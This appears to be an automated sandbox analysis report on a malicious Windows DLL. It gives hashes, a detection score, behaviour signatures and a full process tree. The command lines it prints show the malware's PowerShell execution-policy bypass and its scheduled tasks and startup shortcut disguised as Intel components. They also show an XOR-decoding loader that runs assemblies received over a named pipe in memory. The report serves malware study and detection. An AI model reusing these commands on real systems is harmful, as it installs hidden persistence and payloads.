Edit tour
Windows
Analysis Report
JkICQ13OOY.dll
Overview
General Information
| Sample name: | JkICQ13OOY.dllrenamed because original name is a hash value |
| Original sample name: | c6aad319fcaa6c5f87dc49805d5e287f1870e61e0b93e17b4da556865c212e25.dll.exe |
| Analysis ID: | 1576677 |
| MD5: | cf174c5741c4dce62fb76c183b5b36d5 |
| SHA1: | b982d92cac5d045a983b16033c701e59be93f133 |
| SHA256: | c6aad319fcaa6c5f87dc49805d5e287f1870e61e0b93e17b4da556865c212e25 |
| Tags: | exeuser-JAMESWT_MHT |
| Infos: |  |
 | |
Detection
| Score: | 88 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Powershell creates an autostart link
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
loaddll64.exe (PID: 7384 cmdline: loaddll64. exe "C:\Us ers\user\D esktop\JkI CQ13OOY.dl l" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52) 
conhost.exe (PID: 7392 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7436 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\JkI CQ13OOY.dl l",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
rundll32.exe (PID: 7460 cmdline: rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",#1 MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 7444 cmdline:
rundll32.e xe C:\User s\user\Des ktop\JkICQ 13OOY.dll, DllMainer MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 7764 cmdline:
rundll32.e xe C:\User s\user\Des ktop\JkICQ 13OOY.dll, DllMainerI nstall MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 7844 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 7860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7944 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_Hel per /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 7952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7992 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_OnL ogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 8000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 8040 cmdline: "powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_OnLogO nDaily\" / xml \"C:\U sers\user\ AppData\Lo cal\task.x ml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8048 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 8168 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_OnL ogOnDaily /xml C:\Us ers\user\A ppData\Loc al\task.xm l MD5: 76CD6626DD8834BD4A42E6A565104DC2) - powershell.exe (PID: 2764 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_Helper \" /xml \" C:\Users\u ser\AppDat a\Local\ta sk.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3916 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7188 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_Hel per /xml C :\Users\us er\AppData \Local\tas k.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2) - rundll32.exe (PID: 8184 cmdline:
rundll32.e xe C:\User s\user\Des ktop\JkICQ 13OOY.dll, DllMainerI nstallUser Only MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 1268 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7376 cmdline:
"powershel l.exe" -No Profile -E xecutionPo licy Bypas s -Command $WSc riptShell = New-Obje ct -ComObj ect WScrip t.Shell $Shortcu t = $WScri ptShell.Cr eateShortc ut('C:\Use rs\user\Ap pData\Roam ing/Micros oft/Window s/Start Me nu/Program s/Startup/ IntelManag ementEngin e.lnk') $Shortcu t.TargetPa th = 'powe rshell.exe ' $Sho rtcut.Desc ription = 'The Intel Managemen t Engine ( ME) is an embedded m icrocontro ller runni ng on a de dicated mi croprocess or integra ted into I ntel chips ets.' $Shortcut. Arguments = '-NoProf ile -Execu tionPolicy Bypass -C ommand C:\ Windows\Sy stem32\run dll32.exe "C:\Users\ user\AppDa ta\Roaming /IntelMana gementUnit /Mainer.dl l",DllMain erUserOnly ' $Sho rtcut.Wind owStyle = 7 $Sho rtcut.Save () MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7532 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine r MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 7564 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine rInstall MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 2508 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 8172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 4108 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_Hel per /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 7396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7284 cmdline:
"schtasks. exe" /Dele te /TN Int elProfileU pdater_OnL ogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 2156 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7808 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_OnLogO nDaily\" / xml \"C:\U sers\user\ AppData\Lo cal\task.x ml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 8132 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_OnL ogOnDaily /xml C:\Us ers\user\A ppData\Loc al\task.xm l MD5: 76CD6626DD8834BD4A42E6A565104DC2) - powershell.exe (PID: 4120 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "schtasks /create /t n \"IntelP rofileUpda ter_Helper \" /xml \" C:\Users\u ser\AppDat a\Local\ta sk.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7964 cmdline:
"C:\Window s\system32 \schtasks. exe" /crea te /tn Int elProfileU pdater_Hel per /xml C :\Users\us er\AppData \Local\tas k.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2) - rundll32.exe (PID: 7588 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine rInstallUs erOnly MD5: EF3179D498793BF4234F708D3BE28633) - taskkill.exe (PID: 8144 cmdline:
"taskkill" /F /IM po wershell.e xe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7) - conhost.exe (PID: 8064 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7312 cmdline:
"powershel l.exe" -No Profile -E xecutionPo licy Bypas s -Command $WSc riptShell = New-Obje ct -ComObj ect WScrip t.Shell $Shortcu t = $WScri ptShell.Cr eateShortc ut('C:\Use rs\user\Ap pData\Roam ing/Micros oft/Window s/Start Me nu/Program s/Startup/ IntelManag ementEngin e.lnk') $Shortcu t.TargetPa th = 'powe rshell.exe ' $Sho rtcut.Desc ription = 'The Intel Managemen t Engine ( ME) is an embedded m icrocontro ller runni ng on a de dicated mi croprocess or integra ted into I ntel chips ets.' $Shortcut. Arguments = '-NoProf ile -Execu tionPolicy Bypass -C ommand C:\ Windows\Sy stem32\run dll32.exe "C:\Users\ user\AppDa ta\Roaming /IntelMana gementUnit /Mainer.dl l",DllMain erUserOnly ' $Sho rtcut.Wind owStyle = 7 $Sho rtcut.Save () MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7216 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7632 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",Dummy MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 7644 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DotNetRu ntimeDebug Header MD5: EF3179D498793BF4234F708D3BE28633) 
WerFault.exe (PID: 8072 cmdline: C:\Windows \system32\ WerFault.e xe -u -p 7 644 -s 372 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - rundll32.exe (PID: 7692 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine rUserOnly MD5: EF3179D498793BF4234F708D3BE28633) - powershell.exe (PID: 3856 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "Write-Hos t 'Dummy p rocess sta rted. Pres s Ctrl+C t o exit.'; while ($tr ue) { try { Start-Sl eep -Secon ds 1 } cat ch { Write -Host 'Clo se signal received. Exiting... '; break } }" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4888 cmdline:
"powershel l.exe" -Ex ecutionPol icy Bypass -Command "function Load-Assem bly($asmBy tes) { # XOR the assembly byte array $xorK ey = 164 [byte[] ] $decoded Bytes = Ne w-Object b yte[] $asm Bytes.Leng th for ($i = 0; $i -l t $asmByte s.Length; $i++) { $decod edBytes[$i ] = $asmBy tes[$i] -b xor $xorKe y } # Load the assemb ly from th e modified byte arra y $ass embly = [S ystem.Refl ection.Ass embly]::Lo ad($decode dBytes) # Searc h for a Pr ogram clas s and a Ma in method to invoke $progr amType = $ assembly.G etType(\"P rogram\", $false) if ($pro gramType - ne $null) { $m ainMethod = $program Type.GetMe thod(\"Mai n\", [Syst em.Reflect ion.Bindin gFlags] \" Static,Pub lic,NonPub lic\") if ($ma inMethod - ne $null - and $mainM ethod.GetP arameters( ).Length - eq 1 -and $mainMetho d.GetParam eters()[0] .Parameter Type -eq [ string[]]) { $argument s = [Syste m.String[] ]@(\"--pow ershell\") $ mainMethod .Invoke($n ull, [Syst em.Object[ ]]@(,$argu ments)) } else { #th row \"No e ntry point found.\"; } } e lse { #throw \ "Program c lass not f ound.\"; } } $a = [System.R eflection. Assembly]: :LoadFrom( \"C:\Users \user\AppD ata\Roamin g\IntelMan agementUni t\FSharp.C ore.All.dl l\"); $in_pipe = New-Obje ct System. IO.Pipes.N amedPipeCl ientStream (\"XPPYQKI NMHMWHQNYM QCUQIPEPGQ FJXLIYYECM MVQOLJNIMT JUEEDNSHUL LXPEFHEHWF GELSYOPPOK RMYCCRJMMA DEUFNIAITF SINYJBPTGS LFHVIUVOLP NRGCXQYVLR C\"); $i n_pipe.Con nect(); # Get the current pr ocess ID $processI d = [Syste m.Diagnost ics.Proces s]::GetCur rentProces s().Id # Conver t the proc ess ID to byte array $bytes = [System. BitConvert er]::GetBy tes($proce ssId) # Assumin g $in_pipe is a Syst em.IO.Pipe s.PipeStre am or simi lar # Yo u would wr ite the by te array t o it like this: $i n_pipe.Wri te($bytes, 0, $bytes .Length) $in_pipe. Flush() $buffer = new-object byte[] 98 616;$rrrr= $in_pipe.R ead($buffe r, 0, $buf fer.Length );$aaaa=Lo ad-Assembl y($buffer) ;;;;$buffe r = new-ob ject byte[ ] 156160;$ rrrr=$in_p ipe.Read($ buffer, 0, $buffer.L ength);$aa aa=Load-As sembly($bu ffer);;;;$ buffer = n ew-object byte[] 215 04;$rrrr=$ in_pipe.Re ad($buffer , 0, $buff er.Length) ;$aaaa=Loa d-Assembly ($buffer); ;;;" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 7720 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\JkIC Q13OOY.dll ",DllMaine rSmartAndS ilent MD5: EF3179D498793BF4234F708D3BE28633)
- powershell.exe (PID: 6320 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -NoProfile -Executio nPolicy By pass -Comm and C:\Win dows\Syste m32\rundll 32.exe C:\ Users\user \AppData\R oaming/Int elManageme ntUnit/Mai ner.dll,Dl lMainerUse rOnly MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - rundll32.exe (PID: 6912 cmdline:
"C:\Window s\System32 \rundll32. exe" C:\Us ers\user\A ppData\Roa ming/Intel Management Unit/Maine r.dll,DllM ainerUserO nly MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Christopher Peacock '@securepeacock', SCYTHE: | ||
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: frack113: | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||